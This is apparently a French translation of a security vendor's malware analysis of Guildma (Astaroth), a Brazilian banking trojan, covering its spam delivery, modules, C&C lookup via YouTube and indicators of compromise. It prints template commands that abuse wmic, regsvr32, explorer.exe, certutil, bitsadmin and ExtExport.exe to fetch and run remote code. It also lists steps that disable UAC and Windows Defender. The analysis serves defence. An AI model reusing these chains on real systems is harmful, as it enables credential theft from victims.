Guildma : Le diable se déplace en voiture électrique

Dans ce billet, nous allons examiner Guildma (également connu sous le nom d'Astaroth, un puissant démon), un cheval de Troie bancaire latino-américain très répandu. Ce cheval de Troie ciblant le Brésil, écrit en Delphi, se distingue par des techniques d'exécution et d'attaque innovantes. Nous allons décrire la version la plus récente, en soulignant les changements les plus notables apportés depuis le milieu de l'année 2019, lorsqu'une avalanche d'articles sur Guildma a été publiée en réponse à sa plus grande campagne à ce jour.

Caractéristiques

Guildma est un cheval de Troie bancaire latino-américain qui vise exclusivement le Brésil. Sur la base de notre télémétrie - ainsi que de l'attention publique qu'elle a reçue - nous pensons qu'il s'agit du cheval de Troie bancaire le plus efficace et le plus avancé de la région. En plus de cibler les institutions financières, Guildma tente également de voler les identifiants des comptes de messagerie, des boutiques en ligne et des services de streaming, et touche au moins dix fois plus de victimes que les autres chevaux de Troie bancaires latino-américains déjà décrits dans cette série. Il utilise des méthodes d'exécution innovantes et des techniques d'attaque sophistiquées.

Contrairement aux chevaux de Troie bancaires latino-américains que nous avons décrits précédemment, Guildma ne stocke pas les fausses fenêtres pop-up qu'il utilise dans le binaire. Au lieu de cela, l'attaque est orchestrée par son serveur C&C. Cela donne aux auteurs une plus grande flexibilité pour réagir aux contre-mesures mises en place par les banques ciblées.

Guildma met en œuvre les fonctionnalités de porte dérobée suivantes :

• Prise de captures d'écran
• Saisie des frappes
• Émulation du clavier et de la souris
• Blocage des raccourcis (comme la désactivation de la combinaison Alt + F4 pour rendre plus difficile l'élimination des fausses fenêtres qu'elle peut afficher)
• Téléchargement et exécution de fichiers
• Redémarrage de la machine.

Guildma est très modulaire. Au moment de la rédaction du présent document, elle se compose de 10 modules, sans compter les étapes de la chaîne de distribution. La fonctionnalité des différents modules sera examinée plus tard.

Évolution des chaînes de distribution

Notre télémétrie indique que Guildma se propage exclusivement par des courriers électroniques de spam avec des pièces jointes malveillantes. Voici quelques exemples d'une campagne menée à partir de la mi-novembre 2019.

Figure 1. Exemple de spam (traduction : « Bonjour, veuillez m'expliquer ces photos. J'attends votre explication! »).

Figure 2. Exemple de courrier indésirable (traduction : « Cher membre du consórcio, vous trouverez ci-joint la preuve de l'offre n° 75432 »).

Figure 3. Exemple de courrier indésirable (traduction : « Bonjour, j'envoie la preuve de transfert - DOC. Citibank »).

Figure 4. Exemple de spam : Fausse facture indiquant qu'un paiement est dû après-demain et que le traitement du paiement peut prendre jusqu'à 72 heures.

L'une des caractéristiques des chaînes de distribution de Guildma est l'utilisation d'outils déjà présents sur le système, souvent de manière nouvelle et inhabituelle.

Une autre caractéristique est la réutilisation des techniques. De nouvelles techniques sont ajoutées de temps à autre, mais pour la plupart, les développeurs semblent simplement réutiliser des techniques des anciennes versions.

Figure 5. Chaîne de distribution de Guildma version 150

La figure 5 montre la chaîne de distribution de la version 150, mais la structure des chaînes de distribution de Guildma est très dynamique. Par exemple, dans les versions précédentes, le fichier LNK malveillant montré dans la figure 5 n'était pas intégré dans une archive ZIP, ou une archive SFX RAR contenant un installateur MSI était utilisée à la place. De plus, il y avait une autre étape JScript dont le seul but était de télécharger et d'exécuter l'étape JScript finale; il y a eu trop de changements dans l'ensemble pour que nous puissions les intégrer dans cet article. En fait, la seule partie qui n'a pratiquement pas changé est l'étape finale du JScript.

En utilisant les données de notre suivi à long terme et approfondi de cette famille, nous obtenons une très bonne image de l'activité de Guildma.

La figure 6 montre toutes les détections d’ESET de la composante de première étape de Guildma. Comme vous pouvez le voir, les campagnes s'intensifiaient lentement jusqu'à une campagne massive en août 2019, où nous avons vu jusqu'à 50 000 échantillons par jour. Cette campagne a duré près de deux mois et a représenté plus du double du nombre de détections que nous avions vues au cours des dix mois précédents.

Figure 6. Détections de la première phase de la Guildma depuis octobre 2018

Following is a summary of some of the more interesting techniques used in the last 14 months.

Exécution de l’étape JScript

Au cours de l'année dernière, Guildma a utilisé plusieurs méthodes pour exécuter les étapes JScript de sa chaîne de distribution. À la fin de 2018, Guildma cachait son code dans des fichiers eXtensible Stylesheet Language (.xsl) et utilisait wmic.exe pour les télécharger et les exécuter :

wmic.exe <wmic query> /format:"<URL>"

Il est ensuite brièvement passé à l'utilisation de regsvr32.exe et scrobj.dll pour télécharger un objet COM implémenté par JScript et exécuter sa routine d'enregistrement (qui contient le code malveillant) :

regsvr32.exe /s /n /u /i:<URL> scrobj.dll

Plus récemment, les auteurs ont commencé à abuser de l'explorateur Windows pour exécuter l'étape JScript. Cette attaque repose sur le fait que l'Explorateur Windows tente d'ouvrir tout fichier qui lui est transmis en ligne de commande avec son programme associé et sur le fait que l'association par défaut pour les fichiers .js est Microsoft Windows Script Host. Le « script » transmis à Windows Explorer est une commande unique dont le but est de télécharger et d'exécuter l'étape JScript :

echo GetObject('script:<URL>') > <file>.js | explorer.exe <random switches> <file>.js

Exécution des modules binaires

Les méthodes de fonctionnement des modules de PE ne sont pas moins diverses.

Lorsque nous avons commencé à suivre Guildma, il abusait du fichier aswRunDll.exe d'Avast pour lancer la première étape binaire, avec regsvr32.exe comme basculement pour les ordinateurs sur lesquels les produits d'Avast n'étaient pas installés. L'utilisation de aswRunDll.exe a ensuite été abandonnée, laissant regsvr32.exe comme seule méthode d'exécution. Après une brève période d'utilisation de rundll32.exe, Guildma est passé à sa méthode d'exécution actuelle — ExtExport.exe.

ExtExport.exe est un composant non documenté de Microsoft Internet Explorer utilisé pour exporter les signets de Mozilla Firefox et de 360 Secure Browser, et peut être utilisé abusivement pour le chargement latéral de DLL. Lorsque la commande suivante est exécutée, mozcrt19.dll, mozsqlite3.dll et sqlite3.dll sont chargés à partir du dossier spécifié sur la ligne de commande :

C:\Program Files\Internet Explorer\ExtExport.exe <folder> <dummy 1> <dummy 2>

Pour abuser de ceci, vous devriez normalement déposer la DLL à charger comme l'un des fichiers mentionnés ci-dessus; Guildma utilise les trois.

Téléchargement des modules binaires

Guildma a également utilisé plusieurs moyens différents pour télécharger les modules binaires. La première version utilisait certutil.exe copié sur certis.exe (vraisemblablement pour échapper à la détection) :

certis.exe -urlcache -split -f "<URL>" "<destination path>"

Les auteurs sont ensuite passés à BITSAdmin — l'outil de gestion du service de transfert intelligent de Microsoft Background - et l'utilisent toujours au moment de la rédaction du présent document :

bitsadmin.exe /transfer <random number> /priority foreground <URL> <destination>

Pendant quelques mois, les modules binaires ont été encodés en base64 et hébergés sur le Google Cloud. Pendant ce temps, Guildma utilisait à la BITSAdmin et certutil — BITSAdmin pour télécharger les modules et certutil pour les décoder.

Autres changements

Guildma utilise des noms de variables et de fonctions étranges et non descriptifs. Lorsque nous avons commencé à suivre Guildma, les noms, bien qu'absurdes, étaient clairement d'origine humaine (par exemple « radador » pour la fonction de nombres aléatoires ou « Bxaki » pour la fonction de téléchargement). En juin 2019, ils ont tous été changés pour des noms d'apparence aléatoire (par exemple « bx021 » et « mrc430 »). Au début, nous pensions que les auteurs avaient mis en place une sorte d’obfuscateur de script automatisé, mais il s'est avéré qu'il s'agissait d'un changement ponctuel et les noms sont restés les mêmes depuis.

Un ajout relativement récent est la technique séculaire d'utilisation d'ADS (Alternate Data Streams) pour stocker les modules binaires. Tous les modules sont désormais stockés sous la forme ADS d'un seul fichier (par exemple, « desktop.ini:nauwuygiaa.jpg », « desktop.ini:nauwuygiab.jpg », etc.)

Historique des versions

Guildma a apparemment connu de nombreuses versions au cours de son développement, mais il y a eu généralement très peu de développement entre les versions - en raison de son architecture maladroite utilisant des valeurs de configuration codées en dur, les auteurs doivent pour la plupart recompiler tous les binaires pour chaque nouvelle campagne. Un travail qui n'est évidemment pas complètement automatisé, car il y a souvent eu un délai important entre la mise à jour du numéro de version dans les scripts et dans les binaires.

Dans cet article, nous couvrons la version 150, mais depuis que nous avons commencé à écrire, deux autres versions ont été publiées. Elles ne contiennent aucun changement substantiel dans les fonctionnalités ou la distribution, ce qui confirme nos affirmations sur le cycle de développement de Guildma.

L'étape finale de la chaîne de distribution contenait un nom de version (et même avant cela, elle avait l'habitude de télécharger ledit nom avec les modules binaires), mais il a été (probablement) remplacé de façon permanente par un simple « xXx » depuis la version 148.

Le tableau 1 résume toutes les versions publiées depuis que nous avons commencé à suivre activement Guildma en octobre 2018. En regardant les chaînes de version, on a l'impression que l'auteur est passionné tant par l'écologie et les voitures rapides.

Tableau 1. Historique des versions de Guildma

Aperçu du module

Comme mentionné précédemment, Guildma est très modulaire; la structure de ses modules semble être essentiellement constante. Dans cette section, nous allons décrire brièvement la fonctionnalité de chaque module.

Tous les noms de modules sont composés d'un préfixe commun, dépendant de la version, et d'un suffixe spécifique au module. Dans le tableau 2, le préfixe dépendant de la version est andrealfo.

Le tableau 2. Vue d'ensemble des modules de Guildma

À l'exception du chargeur de module principal 1 (*64.~) et de l'injecteur de module principal (*xa.gif, *xb.gif et *xc.gif), tous les modules sont chiffrés avec un simple chiffrement XOR utilisant une clé répétitive de 32 octets. La clé est générée à partir d'une valeur initiale de 32 bits à l'aide de l'algorithme illustré à la figure 7. Cette valeur initiale est obfusquée dans les binaires pour empêcher une extraction simple (voir figure 8).

key = bytearray ();
for i in range ( 32 ):
	key . append ( seed & 0xff );
	seed >>= 1;

Figure 7. Algorithme de génération de clés

Figure 8. Obfuscation de la valeur initiale dans le binaire

Trois modules communiquent avec un serveur C&C : Module principal, module RAT, et voleur de contacts et de formulaires. La communication s'effectue via HTTP(S) en utilisant une combinaison de base64 et de divers algorithmes de chiffrement simples et personnalisés pour protéger les données transférées.

Dans la section suivante, nous décrivons comment l'adresse du serveur C&C est obtenue.

Loadeur du module principal 1 (*64.~)

C'est la première étape binaire de la chaîne.  Le fichier est une DLL téléchargée en deux parties, qui sont concaténées par l'étape JScript précédente. Il charge les trois fichiers composant le chargeur de l'étape suivante (*xa.gif, *xb.gif et *xc.gif), les concatène, mappe le fichier PE résultant dans son propre espace d'adressage et l'exécute.

Le chargement d'un fichier PE est un processus relativement complexe, c'est pourquoi les auteurs ont utilisé la librairie open-source BTMemoryModule à cette fin.

Injecteur du module principal (*xa.gif + *xb.gif + *xc.gif)

Ce module charge l'étape suivante (*gx.gif) à partir du disque et la déchiffre. Il exécute ensuite le premier exécutable existant de la liste suivante et y injecte la charge utile déchiffrée.

• C:\Program Files\AVAST Software\Avast\aswRunDll.exe
• C:\Program Files\Diebold\Warsaw\unins000.exe ^*
• C:\Windows\SysWOW64\userinit.exe
• C:\Windows\System32\userinit.exe

^*  Une application populaire au Brésil pour protéger l'accès aux services bancaires en ligne.

Loadeur de module principal 2 (*gx.gif)

La dernière étape du chargeur est très simple et semble dupliquer inutilement la fonctionnalité du chargeur de module principal 1. Il charge et déchiffre le module principal (*g.gif), le mappe dans son propre espace mémoire et l'exécute.

Module principal (*g.gif)

Le module principal de Guildma orchestre tous les autres modules. Sa mise en œuvre est d'une complexité trompeuse, utilisant d'innombrables minuteries et événements, mais sa fonctionnalité est en fait relativement simple. Il contient du code ancien qui n'est plus utilisé ainsi que du code de pré-production qui n'est pas encore utilisé.

Au chargement, ce module vérifie s'il fonctionne dans un environnement « sandbox » (par exemple, en examinant le nom de l'ordinateur et l'ID du volume du disque système), s'il existe d'autres instances en cours d'exécution (sur la base des noms de fenêtres) et si la langue du système est différente du portugais. Si une vérification révèle que le système est inintéressant ou déjà compromis par Guildma, le logiciel malveillant s’arrête de lui-même.

Dans le cas contraire, le module collecte alors des informations sur le système (nom de l'ordinateur, logiciel de sécurité utilisé, programmes installés...) et établit un contact avec le serveur de C&C. Il commence alors à surveiller les événements intéressants, principalement lors du lancement de certaines applications ou de l'ouverture de sites de banque en ligne, et à exécuter les actions appropriées (par exemple, prendre des captures d'écran, empêcher l'utilisateur de fermer la fenêtre en interceptant les raccourcis clavier, lancer le module RAT, etc.)

Le module met également en œuvre des commandes de porte dérobée dont la fonctionnalité recoupe largement celle du module RAT.

Voleur de contacts et graveur de formulaires (*c.jpg)

Ce module a deux fonctions : la collecte d'adresses électroniques et de données de formulaires à partir de pages Web.

Les adresses électroniques sont obtenues à partir de clients de messagerie de bureau (tels que Microsoft Outlook, ThunderBird et The Bat !) en analysant leurs carnets d'adresses ainsi que les courriers électroniques eux-mêmes.

Le collecteur de formulaires utilise la technologie COM de Windows pour interagir avec Internet Explorer. Il attend qu'un site ciblé soit ouvert (principalement des webmails, des boutiques en ligne et des passerelles de paiement brésiliens) et déconnecte ensuite l'utilisateur, obligeant la victime à saisir ses identifiants. Il récupère ensuite le DOM et recherche les valeurs importantes des champs de saisie (tels que les noms d'utilisateur, les mots de passe et les numéros de carte de crédit).

Module RAT (*dwwn.gif, *dx.gif)

Le module RAT se présente sous la forme de deux compilations fonctionnellement identiques - DLL (*dwwn.gif) et EXE (*.dx.gif).

Il met en œuvre les fonctionnalités de téléchargement et d'exécution, peut faire des captures d'écran, émuler la saisie au clavier et à la souris, et redémarrer l'ordinateur.

La plupart des chevaux de Troie bancaires latino-américains affichent de fausses fenêtres pop-up basées sur la surveillance du nom de la fenêtre active. Ces fenêtres sont généralement stockées dans le binaire. Nous n'avons pas trouvé un tel code dans Guildma, mais le module RAT contient un formulaire Delphi mettant en œuvre un simple navigateur Web. Comme il est également exécuté sur la base du nom de la fenêtre active, nous pensons que ce formulaire est utilisé pour afficher de faux dialogues à l'utilisateur.

MailPassView (*a.jpg) et BrowserPassView (*b.jpg)

Il s'agit d'outils gratuits de Nirsoft permettant d'extraire les informations d'identification enregistrées dans les clients de messagerie électronique et les navigateurs web les plus populaires, respectivement. Depuis que Nirsoft a supprimé le support du fonctionnement silencieux (sortie dans un fichier, sans interface graphique) des versions plus récentes afin de limiter l'abus de ces outils par les logiciels malveillants, les auteurs de Guildma utilisent des versions plus anciennes qui possédaient ces fonctionnalités. Les mêmes outils sont également utilisés par Mispadu. Par contre, Mispadu utilise des versions plus récentes avec le support du fonctionnement silencieux réintégré.

Dropper du module JScript (*i.gif)

This module drops and executes (using cscript.exe) a JScript file. The script consists of two parts — the first part is stored as one long encrypted string, while the second part is assembled from many short strings (some encrypted and some in plaintext). Worthy of note is the fact that strings in the dropped JScript file are encrypted by this dropper module with a randomly generated key, so they are present in the clear in the dropper.

The script executes the following actions:

Ce module dépose et exécute (à l'aide de cscript.exe) un fichier JScript. Le script se compose de deux parties : la première partie est stockée sous la forme d'une longue chaîne chiffrée, tandis que la seconde partie est assemblée à partir de nombreuses chaînes courtes (certaines chiffrées et d'autres en texte clair). Il convient de noter que les chaînes du fichier JScript déposé sont chiffrées par ce module de dépôt avec une clé générée de manière aléatoire, de sorte qu'elles sont présentes en clair dans le dépôt.

Le script exécute les actions suivantes :

• Désactive l'UAC
• Désactive la vérification de la signature EXE
• Désactive Windows Defender
• Crée une règle de pare-feu désactivant l'accès au réseau.
  C:\Program Files\AVAST Software\Avast\Setup\avast.setup

• Désactive le pilote wsddntf (Diebold Warsaw GAS Tecnologia - le logiciel de protection de l'accès aux services bancaires introduit plus tôt)
• Ajoute une exception de pare-feu pour les fichiers utilisés comme cibles d'injection.
  • C:\Program Files\Diebold\Warsaw\unins000.exe
  • C:\Program Files\AVAST Software\Avast\aswRunDll.exe

Nous croyons que ce module pourrait encore être en cours de développement, car nous ne l'avons jamais observé déposer le script sur l’une ou l’autre de nos machines de test.

Nouveaux développements (depuis la mi-2019)

Nouvel extracteur C&C

Dans la version 142, un nouveau mode de distribution des serveurs C&C, abusant des profils YouTube et Facebook, a été mis en place. Cependant, les auteurs ont cessé d'utiliser Facebook presque immédiatement et, au moment de la rédaction de ce document, ils se fient entièrement à YouTube. Ceci fonctionne de façon similaire à Casbaneiro, mais en un peu plus grossier. Alors que Casbaneiro cachait les données dans des descriptions vidéo et les obfusquait en les intégrant dans une URL, Guildma se contente de placer les données dans la description du canal. Le début et la fin des adresses C&C chiffrées sont délimités par « ||| ». Les données intermédiaires sont codées en base64 et chiffré à l'aide de l'algorithme de chiffrement de chaînes de Mispadu. C'est maintenant la principale méthode de récupération des serveurs C&C; l'ancienne méthode (décrite par Avast) est toujours présente en tant que sauvegarde.

Figure 9. Domaines de serveurs C&C Guildma chiffrés et stockés sur YouTube

Modules ajoutés et supprimés

Le module compte-gouttes JScript décrit précédemment a été ajouté dans la version 145. A l'inverse, dans la version 139, Guildma a supprimé deux autres modules présents dans les versions antérieures - le mass mailer (*f.jpg) et son chargeur (*e.jpg). Dans les versions suivantes, ces modules étaient toujours accessibles sous les noms attendus (<version prefix>e.jpg et <version prefix>f.jpg) à partir du même serveur que les autres modules. Cela nous amène à penser que ces modules sont toujours en cours de développement, mais qu'ils ne sont désormais distribués que selon les besoins, vraisemblablement en utilisant la commande de téléchargement et d'exécution de la backdoor.

Nouveau chiffrement des chaînes de caractères

Le module JScript dropper a apporté avec lui un nouvel algorithme de chiffrement des chaînes de caractère. Une variante de cet algorithme (illustrée à la figure 10) a été propagée dans d'autres modules dans la version 147.

def decrypt ( ct, key ):
	# stage 1
	ct = unhexlify ( ct );
	last = ct [ 0 ];
	s = bytearray ( ct [ 1 : ] );
	for i in range ( len ( s ) ):
		x = s [ i ] ^ key [ i % len ( key ) ];
		if last > x:
			x += 0xff;
		x -= last;
		last = s [ i ];
		s [ i ] = x;

	# stage 2 - reverse string
	s = s [::-1]; 

	# stage 3 - c = not ( c - 10 )
	s = "" . join ( [ chr ( ( ~( c - 10 ) ) & 0xff ) for c in s ] ); 

	# stage 4 - Base25 decode and key subtraction
	k = ord ( s [ 0 ] ) - 65;
	ot = "";
	for i in range ( 1, len ( s ), 2 ):
		ot += chr ( ( ord ( s [ i ] ) - 65 ) * 25 + ord ( s [ i + 1 ] ) - 65 - k - 100 );

	return ot;

Figure 10. Nouvel algorithme de chiffrement des chaînes de caractères

A l'origine, Guildma utilisait le même chiffrement de chaîne que Casbaneiro. Le nouvel algorithme comporte quatre étapes et, comme vous pouvez le voir, l'algorithme original de chiffrement des chaînes de caractères est toujours utilisé comme première étape. Il faut également noter que la quatrième étape utilise à nouveau l'algorithme de chiffrement de Mispadu.

Dans la version 148, Guildma a mis en place une table de chaînes de caractères. L’ensemble des chaînes y sont déchiffrées au début de l'exécution et accessibles à partir de la table si nécessaire.

Suppression des cibles internationales

Dans la version 138, Guildma a ajouté la possibilité de cibler des institutions (principalement des banques) en dehors du Brésil. Malgré cela, nous n'avons observé aucune campagne internationale; les campagnes hébergeant des fichiers sur l'infrastructure des travailleurs de Cloudflare sont même allées jusqu'à bloquer tout téléchargement provenant d'IP non brésiliens. En fait, au cours des 14 derniers mois, nous n'avons vu aucune campagne ciblant les utilisateurs hors du Brésil.

Enfin, dans la version 145, la possibilité de cibler des institutions en dehors du Brésil a été supprimée. Sur la base de ces faits, nous croyons qu'il s'agissait simplement d'une fonctionnalité en cours de développement qui a fini par être supprimée.

Conclusion

Dans cette partie de la série, nous avons parlé de Guildma, le cheval de Troie bancaire latino-américain le plus répandu que nous ayons vu. Nous avons montré la richesse de son évolution historique tout en nous concentrant sur la variante la plus récente.

Guildma partage une fois de plus les caractéristiques dominantes d'un cheval de Troie bancaire latino-américain. Il est écrit en Delphi, cible la région, implémente une fonctionnalité de backdoor, divise sa fonctionnalité en plusieurs modules et abuse d'outils légitimes.

Guildma partage également des caractéristiques communes intéressantes avec les familles décrites plus haut dans cette série. En effet, son algorithme de chiffrement actuel combine ceux utilisés par Casbaneiro et Mispadu.

Pour toute question, contactez-nous à l'adresse suivante : threatintel@eset.com. Des indicateurs de compromis peuvent également être trouvés dans notre dépôt GitHub.

Indicateurs de compromission (IoCs)

Hashes

Noms de fichier

C:\Users\Public\Libraries\qlanl\*

Liens de démarrage

• Location

%APPDATA%\Microsoft\Programs\StartUp\reiast%USERNAME%%COMPUTERNAME%.lnk

• Cibles

C:\Program Files (x86)\Internet Explorer\ExtExport.exe
C:\Program Files\Internet Explorer\ExtExport.exe

• Args

<install dir> <rand> <rand>
(où <rand> est une chaîne aléatoire de 5 à 9 caractères générée à partir de l'alphabet qwertyuiop1lgfdsas2dfghj3zcvbnmm)

Serveurs C&C

• https://www.zvatrswtsrw[.]ml
• https://xskcjzamlkxwo[.]gq
• https://www.vhguyeu[.]ml
• https://www.carnataldez[.]ml
• https://www.movbmog[.]ga
• https://iuiuytrytrewrqw[.]gq
• https://www.gucinowertr[.]tk
• https://equilibrios[.]ga
• https://www.clooinfor[.]cf
• https://ambirsr[.]tk
• https://dbuhcbudyu[.]tk
• https://nvfjvtntt[.]cf
• http://whia7g.acquafufheirybveru[.]online

Techniques MITRE ATT&CK